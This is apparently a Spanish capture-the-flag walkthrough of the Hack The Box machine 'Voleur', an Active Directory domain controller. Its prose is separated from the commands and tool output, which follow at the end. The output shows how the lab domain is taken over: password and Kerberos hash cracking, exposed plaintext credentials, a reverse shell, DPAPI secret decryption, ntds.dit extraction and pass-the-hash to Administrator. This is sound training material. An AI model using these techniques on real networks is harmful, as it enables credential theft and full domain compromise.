Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 11:07 EDT
Nmap scan report for 10.10.11.76
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-13 23:07:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9398/tcp filtered unknown
49664/tcp open msrpc Microsoft Windows RPC
54784/tcp open msrpc Microsoft Windows RPC
62110/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
62111/tcp open msrpc Microsoft Windows RPC
62123/tcp open msrpc Microsoft Windows RPC
62136/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-13T23:08:17
|_ start_date: N/A
|_clock-skew: 8h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.42 seconds
Veremos varios puertos interesantes, entre ellos el SMB, WinRM, etc... Nos muestra un dominio llamado voleur.htb el cual nos vamos añadir a nuestro archivo hosts.
Lo guardamos y seguimos realizando un pequeño fuzzing general.
Si leemos la informacion de la maquina de HTB veremos que nos proporcionan unas credenciales de acceso como en un pentesting real:
Teniendo estas credenciales vamos a probarlas para obtener un TGT pero antes vamos a modificar la zona horaria de nuestra maquina para que este enlazada con la de la maquina victima, ya que muchas veces en este tipo de maquinas vienen errores de este estilo:
Info:
Una vez establecida la zona horaria de dicha maquina, vamos a probar a lanzar el siguiente comando para intentar obtener el TGT del usuario de esta forma:
Info:
NOTA: Tiene que ser de forma seguida, ya que si pasa mucho tiempo entre la maquina y tu maquina dara un error.
Vamos a exportar en la variable de kerberos el archivo generado.
Ahora vamos a probar por LDAP a ver si el usuario esta correctamente autenticado por kerberos gracias al archivo exportado/generado con su TGT.
Info:
Veremos que ha funcionado, por lo que vamos a listar los usuarios gracias a estas credenciales con el TGT del archivo mediante kerberos.
Info:
Veremos varios usuarios los cuales vamos a meter en una lista de usuarios, simplemente para saber cuales tenemos.
users.txt
Ahora teniendo esa autenticacion vamos a provecharla para volcarnos la informacion con BloodHound de esta forma:
BloodHound
Vamos ha descargarnos en un ZIP la informacion del dominio para luego pasarsela a BloodHound.
Info:
Ahora vamos a instalar BloodHound de forma rapida en un docker:
Ahora que esta importado en nuestro docker y levantado podremos acceder a el desde la siguiente URL.
Nos logueamos con las credenciales propocionadas por la herramienta, entrando nos pedira cambiar las credenciales y ya nos metera dentro:
Una vez dentro vamos a importar el .zip y tendremos que esperar un poco a que cargue todos los datos, despues cuando vayamos al dashboard principal veremos todos los datos, vamos a investigar el usuario ryan.naylor a ver que tiene.
Vemos que el usuario ryan.naylor es del grupo FIRST-LINE-TECHNICIANS y este a su vez:
Vemos que este grupo tiene los privilegios WriteOwner, WriteDACL, GenericWrite respecto al grupo de Administradores, esto es muy interesante, pero no podemos hacer nada respecto a dicho grupo simplemente pertenecemos a el, vamos a enumerar los recursos compartidos del SMB:
Info:
Veremos un recurso llamado IT en el cual podemos entrar, vamos a ver que hay dentro de esta forma:
Info:
Veremos que ha funcionado, vamos a listar las carpetas compartidas y meternos dentro del IT.
Info:
Ahora usaremos el IT de esta forma:
Info:
Si nos movemos dentro de dicha carpeta...
Info:
Vamos a descargarnos dicho archivo a ver que vemos dentro del mismo:
Ahora vamos a salirnos con exit y leer el archivo a ver que contiene, pero si lo intentamos leer veremos que esta encriptado, por lo que vamos a intentar crackearlo:
Info:
Veremos que ha funcionado, vamos a utilizar dicha contraseña para decodificarlo y ver que contiene.
Info:
Veremos informacion muy valiosa:
INFO
Vemos que con el usuario svc_ldap podemos hacer esto:
Podremos de alguna forma tener permisos de GenericWrite sobre el usuario LACEY.MILLER.
Vamos a realizar lo siguiente, obtendremos un TGT del usuario svc_ldap para poder utilizarlo:
Info:
Una vez generado esto, vamos a exportarlo en nuestra variable de kerberos.
Escalate user svc_winrm
Ahora vamos a probarlo haciendo lo siguiente:
Info:
Veremos que funciona, por lo que vamos a realizar un kerberoasting sobre los usuarios con este usuario, vamos a descargarnos de un repo la herramienta que vamos a utilizar.
Veremos que ha funcionado, hemos obtenido los hashes TGT de los usuarios svc_winrm y lacey.miller, por lo que vamos a probar lo siguiente:
Vamos a guardar los hashes en un archivo.
hash.lacey.miller
hash.svc_winrm
Si probamos con el usuario svc_winrm veremos lo siguiente:
Info:
Veremos que ha funcionado, por lo que vamos a obtener un TGT de esta forma para autenticarnos por WinRM con dicho TGT como hemos echo en otras ocasiones.
Info:
Ahora exportaremos la variable y añadiremos el dominio dentro del archivo kerberos para que no de errores con el KDC.
Si porbamos a conectarnos con dicho usuario de esta forma:
Info:
Veremos que ha funcionado, por lo que leeremos la flag del usuario.
user.txt
Escalate Privileges
Este usuario svc_winrm como tal no nos es muy util, pero recordemos que el usuario svc_ldap pertenece al grupo de RESTORE_USERS que ese si es interesante, ahora teniendo una shell interactiva podremos escalar al usuario svc_ldap mediante RunasCs.exe que nos tendremos que descargar.
Una vez descargado el .zip del RunasCs vamos a descomprimirlo.
Info:
Ahora desde la shell vamos a descargarnos el RunasCs.exe llendo al directorio Downloads de nuestra carpeta de usuario para que podamos utilizarlo.
Info:
Ahora si desde una shell de Windows poniendo shell en el meterpreter...
Pero antes nos pondremos a la escucha:
Ahora si enviamos este comando...
Info:
Ahora si volvemos a donde tenemos la escucha, veremos lo siguiente:
Veremos que obtenemos una shell como el usuario svc_ldap vamos a consultar los usuarios eliminados de esta forma:
Info:
Vemos que habia un usuario llamado Todd Wolfe, vamos a probar a recuperarlo de esta forma:
Info:
Veremos que ha funcionado y recordemos que la contraseña del excel que vimos anteriormente era NightT1meP1dg3on14 vamos a probar si sigue funcionando de esta forma:
Info:
Ahora exportamos la variable:
Y si vemos en BloodHound lo que pude hacer este usuario, veremos que tiene un grupo asociado llamado SECOND-LINE-TECHNICIANS y acordemonos de que la informacion la encontramos por SMB por lo que vamos a probar a listar los recursos SMB con este usuario utilizando su TGT a ver que vemos.
Info:
Vemos que sigue estando el de IT por lo que vamos a meternos dentro del mismo, como hicimos anteriormente:
Info:
Ahora vamos a poner los siguiente comandos para desplazarnos al recurso de IT e ir a la carpeta que nos interesa directamente:
Info:
Veremos que es la carpeta del usuario todd.wolfe entera, por lo que vamos a descargarnos toda la info interesante, pero nos iremos a esta ruta:
Info:
Veremos cosas interesantes por aqui entre ellas la carpeta Credentials y Protect, por lo que vamos a descargarnos los archivos de cada una de ellas.
Una vez echo esto ya nos podremos salir, ya que estos archivos son los principales para poder obtener las credenciales de un usuario que todavia no sabemos.
Tendremos que establecer el SID de como se llamaba la carpeta de dicho archivo ya que es su SID correcto.
Info:
Veremos que nos ha decodificado la clave secreta de forma correcta, ahora con esto podremos saber las credenciales de dicho usuario pudiendo decodificarlas.
Info:
Veremos que ha funcionado y obtendremos las credenciales del usuario jeremy.combs, ahora tendremos que realizar lo mismo de siempre obtener el TGT del usuario en cuestion y si vemos la informacion del usuario en BloodHound veremos lo siguiente:
Pertenece a un grupo llamado THIRD-LINE TECHNICIANS que por lo que se ve tendremos que realizar los mismos pasos de antes, metiendonos en el SMB ahora con este usuario en la carpeta IT y ver que contiene dicha carpeta de dicho grupo.
Vamos a obtener el TGT del usuario.
Info:
Exportaremos la variable de kerberos.
Ahora vamos a conectarnos directamente al servidor SMB con dicho TGT y usar la carpeta IT de esta forma:
Info:
Veremos 2 archivos interesantes uno es la clave privada PEM del usuario jeremy.combs y lo otro es una nota simple que pone lo siguiente:
Lo que nos dice basicamente es que han implementado una herramienta llamada WSL propia de Linux para realizar las copias de seguridad, con esta informacion se nos ocurre hacer lo siguiente.
Recordemos que habia en el escaneo un puerto 2222 que podemos deducir que es el SSH para conectarnos de forma remota al equipo, pero si investigamos un poco mas veremos que el id_rsa no es del usuario jeremy.combs si no, del usuario svc_backup y esto lo sabemos por esta comprobacion.
Info:
Vemos que es del usuario svc_backup, vamos a probar a realizar lo siguiente:
Info:
Vemos que ha funcionado y seremos el usuario svc_backup pero dentro de un linux, si hacemos sudo -l veremos lo siguiente:
Vemos que podemos ser directamente root.
Info:
Pero en este caso no importa de mucho, siendo root podremos probar a listar las particiones que hay montadas dentro del linux, por que recordemos que linux puede ver las particiones del sistema si esta dentro del mismo disco particionado, pero desde windows no.
Info:
Vemos que si esta montado el disco C, por lo que podremos realizar un volcado de los secretos de Windows pero no podemos tocar la SAM y todo esto de forma directa, si investigamos un poco veremos que hay una carpeta llamada IT y que siguiendo la estructura de carpetas nos lleva a esto:
Info:
Veremos que hay 2 carpetas y en cada una de ellas veremos los siguientes archivos:
'Active Directory'
registry
Ahora nos copiaremos los siguientes archivos en la carpeta /tmp:
Estos 2 archivos son los importantes para realizar un volcado de los secretos de Windows.
Ahora desde la /tmp vamos a pasarnos los archivos a nuestra maquina hosts de esta forma:
Maquina atacante
Maquina victima
Ahora si listamos nuestra maquina atacante veremos que se pasaron bien los archivos.
Info:
Con esto veremos que hemos obtenido los hashes de los usuarios del dominio, por lo que vamos a generar un TGT del usuario admin con el hash de esta forma:
Info:
Ahora exportamos la variable de kerberos.
Ahora con todo esto configurado vamos a meternos en la shell interactiva de evil-winrm con el hash realizando un Pass-The-Hash y con la autenticacion de kerberos que hemos generado.
Info:
Veremos que ha funcionado, por lo que leeremos la flag del usuario admin.
2025-10-14 10:20:53.328109 (-0700) +2.407339 +/- 0.013692 voleur.htb 10.10.11.76 s1 no-leap
CLOCK: time stepped by 2.407339
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: voleur.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 12 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.voleur.htb
INFO: Done in 00M 06S
INFO: Compressing output into 20251014102053_bloodhound.zip
wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xvzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli install
..............................<RESTO DE INFO>......................................
Container bloodhound-graph-db-1 Creating
Container bloodhound-app-db-1 Creating
Container bloodhound-graph-db-1 Created
Container bloodhound-app-db-1 Created
Container bloodhound-bloodhound-1 Creating
Container bloodhound-bloodhound-1 Created
Container bloodhound-app-db-1 Starting
Container bloodhound-graph-db-1 Starting
Container bloodhound-app-db-1 Started
Container bloodhound-graph-db-1 Started
Container bloodhound-graph-db-1 Waiting
Container bloodhound-app-db-1 Waiting
Container bloodhound-graph-db-1 Healthy
Container bloodhound-app-db-1 Healthy
Container bloodhound-bloodhound-1 Starting
Container bloodhound-bloodhound-1 Started
[+] BloodHound is ready to go!
[+] You can log in as `admin` with this password: bnf8XsztC4Hypx6nMV5eSlhHpuDfEWgH
[+] You can get your admin password by running: bloodhound-cli config get default_password
[+] You can access the BloodHound UI at: http://127.0.0.1:8080/ui/login
2025-10-14 10:38:00.846037 (-0700) +3.138291 +/- 0.013889 voleur.htb 10.10.11.76 s1 no-leap
CLOCK: time stepped by 3.138291
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB dc.voleur.htb 445 dc [*] Enumerated shares
SMB dc.voleur.htb 445 dc Share Permissions Remark
SMB dc.voleur.htb 445 dc ----- ----------- ------
SMB dc.voleur.htb 445 dc ADMIN$ Remote Admin
SMB dc.voleur.htb 445 dc C$ Default share
SMB dc.voleur.htb 445 dc Finance
SMB dc.voleur.htb 445 dc HR
SMB dc.voleur.htb 445 dc IPC$ READ Remote IPC
SMB dc.voleur.htb 445 dc IT READ
SMB dc.voleur.htb 445 dc NETLOGON READ Logon server share
SMB dc.voleur.htb 445 dc SYSVOL READ Logon server share
impacket-smbclient -k -no-pass @dc.voleur.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
#
shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL
use IT
ls
drw-rw-rw- 0 Wed Jan 29 01:10:01 2025 .
drw-rw-rw- 0 Thu Jul 24 13:09:59 2025 ..
drw-rw-rw- 0 Wed Jan 29 01:40:17 2025 First-Line Support
cd First-Line Support
ls
drw-rw-rw- 0 Wed Jan 29 01:40:17 2025 .
drw-rw-rw- 0 Wed Jan 29 01:10:01 2025 ..
-rw-rw-rw- 16896 Thu May 29 15:23:36 2025 Access_Review.xlsx
get Access_Review.xlsx
office2john Access_Review.xlsx > hash.xlsx
john --wordlist=<WORDLIST> hash.xlsx
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 AVX 4x / SHA512 128/128 AVX 2x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1 (Access_Review.xlsx)
1g 0:00:00:02 DONE (2025-10-14 10:46) 0.4273g/s 341.8p/s 341.8c/s 341.8C/s football1..martha
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
User,Job Title,Permissions,Notes
Ryan.Naylor,First-Line Support Technician,SMB,Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant,First-Line Support Technician,SMB,
Lacey.Miller,Second-Line Support Technician,Remote Management Users,
Todd.Wolfe,Second-Line Support Technician,Remote Management Users,Leaver. Password was reset to NightT1meP1dg3on14 and account deleted.
Jeremy.Combs,Third-Line Support Technician,Remote Management Users.,Has access to Software folder.
Administrator,Administrator,Domain Admin,Not to be used for daily tasks!
Service Accounts,,,
svc_backup, ,Windows Backup,Speak to Jeremy!
svc_ldap,,LDAP Services,P/W - M1XyC9pW7qT5Vn
svc_iis,,IIS Administration,P/W - N5pXyW1VqM7CZ8
svc_winrm,,Remote Management ,Need to ask Lacey as she reset this recently.
svc_ldap: M1XyC9pW7qT5Vn
svc_iis: N5pXyW1VqM7CZ8
svc_winrm: (Lacey lo reseteó recientemente)
2025-10-14 11:08:21.053988 (-0700) +1.847824 +/- 0.014614 voleur.htb 10.10.11.76 s1 no-leap
CLOCK: time stepped by 1.847824
/home/kali/Desktop/voleur/bloodyAD/.venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_ldap.ccache
john --format=krb5tgs --wordlist=<WORDLIST> hash.svc_winrm
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFireInsidedeOzarctica980219afi (?)
1g 0:00:00:02 DONE (2025-10-14 11:24) 0.4081g/s 4682Kp/s 4682Kc/s 4682KC/s AHANACK6978012..ADRIANAH
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
2025-10-14 11:27:40.036901 (-0700) +44.979981 +/- 0.014028 voleur.htb 10.10.11.76 s1 no-leap
CLOCK: time stepped by 44.979981
/home/kali/Desktop/voleur/bloodyAD/.venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_winrm.ccache
export KRB5CCNAME=svc_winrm.ccache #Exportar la variable con el de svc_winrm
sudo tee -a /etc/krb5.conf << 'EOF'
[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = true
[realms]
VOLEUR.HTB = {
kdc = dc.voleur.htb
admin_server = dc.voleur.htb
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB
EOF
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> whoami
voleur\svc_winrm
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-733247$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2352 created in background.
listening on [any] 7777 ...
connect to [10.10.14.79] from (UNKNOWN) [10.10.11.76] 53924
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
voleur\svc_ldap
Deleted : True
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
Name : Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectClass : user
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db
Restore-ADObject -Identity "CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb"
net user /domain
User accounts for \\DC
-------------------------------------------------------------------------------
Administrator krbtgt svc_ldap
todd.wolfe
The command completed successfully.
2025-10-14 12:28:37.827367 (-0700) +141.718708 +/- 0.022589 voleur.htb 10.10.11.76 s1 no-leap
CLOCK: time stepped by 141.718708
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in jeremy.combs.ccache
export KRB5CCNAME=jeremy.combs.ccache
impacket-smbclient -k -no-pass @dc.voleur.htb
use IT
cd Third-Line Support
ls
drw-rw-rw- 0 Thu Jan 30 08:11:29 2025 .
drw-rw-rw- 0 Wed Jan 29 01:10:01 2025 ..
-rw-rw-rw- 2602 Thu Jan 30 08:11:29 2025 id_rsa
-rw-rw-rw- 186 Thu Jan 30 08:07:35 2025 Note.txt.txt
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Oct 14 12:37:57 PDT 2025
System load: 0.52 Processes: 9
Usage of /home: unknown Users logged in: 0
Memory usage: 31% IPv4 address for eth0: 10.10.11.76
Swap usage: 0%
363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Jan 30 04:26:24 2025 from 127.0.0.1
* Starting OpenBSD Secure Shell server sshd [ OK ]
svc_backup@DC:~$ whoami
svc_backup
Matching Defaults entries for svc_backup on DC:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User svc_backup may run the following commands on DC:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
sudo su
root@DC:/home/svc_backup# whoami
root
ls -la /mnt
total 0
drwxr-xr-x 1 root root 4096 Jan 30 2025 .
drwxr-xr-x 1 root root 4096 Jan 30 2025 ..
drwxrwxrwx 1 svc_backup svc_backup 4096 Jul 24 13:09 c
cd IT/Third-Line Support/Backups
ls -la
total 0
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 .
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 2025 ..
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 'Active Directory'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 registry
total 24592
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 .
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 ..
-rwxrwxrwx 1 svc_backup svc_backup 25165824 Jan 30 2025 ntds.dit
-rwxrwxrwx 1 svc_backup svc_backup 16384 Jan 30 2025 ntds.jfm
total 17952
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 .
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 ..
-rwxrwxrwx 1 svc_backup svc_backup 32768 Jan 30 2025 SECURITY
-rwxrwxrwx 1 svc_backup svc_backup 18350080 Jan 30 2025 SYSTEM
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Warning: Password is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
voleur\administrator
